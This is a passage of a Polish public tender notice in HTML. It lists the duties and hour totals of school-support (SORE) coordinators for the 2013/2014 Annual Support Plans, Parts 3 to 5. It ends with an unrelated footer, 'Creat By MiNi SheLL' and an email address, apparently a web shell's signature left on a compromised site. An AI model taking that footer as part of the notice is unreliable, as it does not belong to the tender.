spotkanie i współpraca z radą pedagogiczną, pomoc w formułowaniu celów, zdiagnozowanie potrzeb i określenie obszaru do rozwoju, wstępne rozpoznanie ofert doskonalenia, wybór zespołu zadaniowego do wypracowania ostatecznych założeń Rocznego Planu Wspomagania   
wsparcie placówki w przygotowaniu założeń Rocznego Planu Wspomagania, ściśle odpowiadającego na potrzeby placówki, zbudowanego na podstawie jednej wybranej oferty doskonalenia, przeprowadzenie warsztatu diagnostyczno-rozwojowego wraz z zespołem zadaniowym
Opracowanie dokumentu Rocznego Planu Wspomagania dla placówki na rok szkolny 2013/2014 zgodnie z wypracowanymi przez zespół zadaniowy założeniami oraz przedłożenie do biura projektu i placówki 
wsparcie przy zapewnianiu obiegu informacji pomiędzy placówką uczestniczącą w projekcie -biurem projektu -SORE (stały kontakt z osobami zaangażowanymi w realizację Rocznego Planu Wspomagania w placówce, dbanie 
o przepływ informacji dotyczących działań podejmowanych w ramach jego współpracy
wnioskowanie o pozyskanie zewnętrznych ekspertów, przedstawienie rekomendacji itp. (jeśli zaistnieje taka potrzeba)
organizowanie zaplanowanych form wspomagania, doskonalenia w zakresie ustalania terminów szkoleń/warsztatów zajęć doskonalących itp. - we współpracy z placówką oraz pracownikami biura projektu
organizacja systemu wsparcia dla pracowników placówki we wdrażaniu nowo nabytych umiejętności i wypracowanych procedur (np. ustalanie terminów konsultacji, zajęć indywidualnych, we współpracy z placówką, Wykonawcami oraz pracownikami biura projektu 
monitorowanie przebiegu realizacji Rocznego Planu Wspomagania w danej placówce, reagowanie na pojawiające się trudności, przekazywanie informacji do biura projektu 
dokumentowanie podejmowanych działań,
przeprowadzenie wśród uczestników projektu ankiet z przebiegu zajęć, realizacji Rocznego Planu Wspomagania itp.
współpraca z radą pedagogiczną nad rekomendacjami do pracy placówki w kolejnym roku szkolnym, przygotowanie sprawozdania z przebiegu realizacji Rocznego Planu Wspomagania, 
przedstawienie sprawozdania z przebiegu realizacji RPW dyrektorowi placówki oraz radzie pedagogicznej, udział w spotkaniu podsumowującym realizację Rocznego Planu Wspomagania
ścisła współpraca z kierownikiem projektu, pracownikami biura projektu, udział 
w spotkaniach SORE w biurze projektu opracowywanie i dostarczanie dokumentów rozliczeniowych do biura projektu. Łączna liczba godzin zegarowych wynosi 246..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ 3. SZKOŁY PODSTAWOWE GRUPA B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obowiązki SORE realizowane na rzecz  placówki edukacyjnej:
spotkanie z dyrektorem placówki, pomoc dyrektorowi w zdiagnozowaniu potrzeb placówki, omówieni e zasad projektu itp.
spotkanie i współpraca z radą pedagogiczną, pomoc w formułowaniu celów, zdiagnozowanie potrzeb i określenie obszaru do rozwoju, wstępne rozpoznanie ofert doskonalenia, wybór zespołu zadaniowego do wypracowania ostatecznych założeń Rocznego Planu Wspomagania   
wsparcie placówki w przygotowaniu założeń Rocznego Planu Wspomagania, ściśle odpowiadającego na potrzeby placówki, zbudowanego na podstawie jednej wybranej oferty doskonalenia, przeprowadzenie warsztatu diagnostyczno-rozwojowego wraz z zespołem zadaniowym
Opracowanie dokumentu Rocznego Planu Wspomagania dla placówki na rok szkolny 2013/2014 zgodnie z wypracowanymi przez zespół zadaniowy założeniami oraz przedłożenie do biura projektu i placówki 
wsparcie przy zapewnianiu obiegu informacji pomiędzy placówką uczestniczącą w projekcie -biurem projektu -SORE (stały kontakt z osobami zaangażowanymi w realizację Rocznego Planu Wspomagania w placówce, dbanie 
o przepływ informacji dotyczących działań podejmowanych w ramach jego współpracy
wnioskowanie o pozyskanie zewnętrznych ekspertów, przedstawienie rekomendacji itp. (jeśli zaistnieje taka potrzeba)
organizowanie zaplanowanych form wspomagania, doskonalenia w zakresie ustalania terminów szkoleń/warsztatów zajęć doskonalących itp. - we współpracy z placówką oraz pracownikami biura projektu
organizacja systemu wsparcia dla pracowników placówki we wdrażaniu nowo nabytych umiejętności i wypracowanych procedur (np. ustalanie terminów konsultacji, zajęć indywidualnych, we współpracy z placówką, Wykonawcami oraz pracownikami biura projektu 

monitorowanie przebiegu realizacji Rocznego Planu Wspomagania w danej placówce, reagowanie na pojawiające się trudności, przekazywanie informacji do biura projektu 

dokumentowanie podejmowanych działań,
przeprowadzenie wśród uczestników projektu ankiet z przebiegu zajęć, realizacji Rocznego Planu Wspomagania itp.
współpraca z radą pedagogiczną nad rekomendacjami do pracy placówki w kolejnym roku szkolnym, przygotowanie sprawozdania z przebiegu realizacji Rocznego Planu Wspomagania, 

przedstawienie sprawozdania z przebiegu realizacji RPW dyrektorowi placówki oraz radzie pedagogicznej, udział w spotkaniu podsumowującym realizację Rocznego Planu Wspomagania
ścisła współpraca z kierownikiem projektu, pracownikami biura projektu, udział 
w spotkaniach SORE w biurze projektu opracowywanie i dostarczanie dokumentów rozliczeniowych do biura projektu. Łączna liczba godzin zegarowych wynosi 164..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ 4. GIMNAZJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obowiązki SORE realizowane na rzecz  placówki edukacyjnej :
spotkanie z dyrektorem placówki, pomoc dyrektorowi w zdiagnozowaniu potrzeb placówki, omówieni e zasad projektu itp.
spotkanie i współpraca z radą pedagogiczną, pomoc w formułowaniu celów, zdiagnozowanie potrzeb i określenie obszaru do rozwoju, wstępne rozpoznanie ofert doskonalenia, wybór zespołu zadaniowego do wypracowania ostatecznych założeń Rocznego Planu Wspomagania   
wsparcie placówki w przygotowaniu założeń Rocznego Planu Wspomagania, ściśle odpowiadającego na potrzeby placówki, zbudowanego na podstawie jednej wybranej oferty doskonalenia, przeprowadzenie warsztatu diagnostyczno-rozwojowego wraz z zespołem zadaniowym
Opracowanie dokumentu Rocznego Planu Wspomagania dla placówki na rok szkolny 2013/2014 zgodnie z wypracowanymi przez zespół zadaniowy założeniami oraz przedłożenie do biura projektu i placówki 
wsparcie przy zapewnianiu obiegu informacji pomiędzy placówką uczestniczącą w projekcie -biurem projektu -SORE (stały kontakt z osobami zaangażowanymi w realizację Rocznego Planu Wspomagania w placówce, dbanie 
o przepływ informacji dotyczących działań podejmowanych w ramach jego współpracy
wnioskowanie o pozyskanie zewnętrznych ekspertów, przedstawienie rekomendacji itp. (jeśli zaistnieje taka potrzeba)
organizowanie zaplanowanych form wspomagania, doskonalenia w zakresie ustalania terminów szkoleń/warsztatów zajęć doskonalących itp. - we współpracy z placówką oraz pracownikami biura projektu
organizacja systemu wsparcia dla pracowników placówki we wdrażaniu nowo nabytych umiejętności i wypracowanych procedur (np. ustalanie terminów konsultacji, zajęć indywidualnych, we współpracy z placówką, Wykonawcami oraz pracownikami biura projektu 
monitorowanie przebiegu realizacji Rocznego Planu Wspomagania w danej placówce, reagowanie na pojawiające się trudności, przekazywanie informacji do biura projektu 
dokumentowanie podejmowanych działań,
przeprowadzenie wśród uczestników projektu ankiet z przebiegu zajęć, realizacji Rocznego Planu Wspomagania itp.
współpraca z radą pedagogiczną nad rekomendacjami do pracy placówki w kolejnym roku szkolnym, przygotowanie sprawozdania z przebiegu realizacji Rocznego Planu Wspomagania, 
przedstawienie sprawozdania z przebiegu realizacji RPW dyrektorowi placówki oraz radzie pedagogicznej, udział w spotkaniu podsumowującym realizację Rocznego Planu Wspomagania
ścisła współpraca z kierownikiem projektu, pracownikami biura projektu, udział 
w spotkaniach SORE w biurze projektu ,opracowywanie i dostarczanie dokumentów rozliczeniowych do biura projektu. Łączna liczba godzin zegarowych wynosi 246..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ 5. SZKOŁY ŚREDNIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obowiązki SORE realizowane na rzeczj  placówki edukacyjnej 
spotkanie z dyrektorem placówki, pomoc dyrektorowi w zdiagnozowaniu potrzeb placówki, omówieni e zasad projektu itp.
spotkanie i współpraca z radą pedagogiczną, pomoc w formułowaniu celów, zdiagnozowanie potrzeb i określenie obszaru do rozwoju, wstępne rozpoznanie ofert doskonalenia, wybór zespołu zadaniowego do wypracowania ostatecznych założeń Rocznego Planu Wspomagania   
wsparcie placówki w przygotowaniu założeń Rocznego Planu Wspomagania, ściśle odpowiadającego na potrzeby placówki, zbudowanego na podstawie jednej wybranej oferty doskonalenia, przeprowadzenie warsztatu diagnostyczno-rozwojowego wraz z zespołem zadaniowym
Opracowanie dokumentu Rocznego Planu Wspomagania dla placówki na rok szkolny 2013/2014 zgodnie z wypracowanymi przez zespół zadaniowy założeniami oraz przedłożenie do biura projektu i placówki 

wsparcie przy zapewnianiu obiegu informacji pomiędzy placówką uczestniczącą w projekcie -biurem projektu -SORE (stały kontakt z osobami zaangażowanymi w realizację Rocznego Planu Wspomagania w placówce, dbanie 
o przepływ informacji dotyczących działań podejmowanych w ramach jego współpracy

wnioskowanie o pozyskanie zewnętrznych ekspertów, przedstawienie rekomendacji itp. (jeśli zaistnieje taka potrzeba)

organizowanie zaplanowanych form wspomagania, doskonalenia w zakresie ustalania terminów szkoleń/warsztatów zajęć doskonalących itp. - we współpracy z placówką oraz pracownikami biura projektu
organizacja systemu wsparcia dla pracowników placówki we wdrażaniu nowo nabytych umiejętności i wypracowanych procedur (np. ustalanie terminów konsultacji, zajęć indywidualnych, we współpracy z placówką, Wykonawcami oraz pracownikami biura projektu 
monitorowanie przebiegu realizacji Rocznego Planu Wspomagania w danej placówce, reagowanie na pojawiające się trudności, przekazywanie informacji do biura projektu 

dokumentowanie podejmowanych działań,
przeprowadzenie wśród uczestników projektu ankiet z przebiegu zajęć, realizacji Rocznego Planu Wspomagania itp.

współpraca z radą pedagogiczną nad rekomendacjami do pracy placówki w kolejnym roku szkolnym, przygotowanie sprawozdania z przebiegu realizacji Rocznego Planu Wspomagania, 
przedstawienie sprawozdania z przebiegu realizacji RPW dyrektorowi placówki oraz radzie pedagogicznej, udział w spotkaniu podsumowującym realizację Rocznego Planu Wspomagania
ścisła współpraca z kierownikiem projektu, pracownikami biura projektu, udział 
w spotkaniach SORE w biurze projektu
opracowywanie i dostarczanie dokumentów rozliczeniowych do biura projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com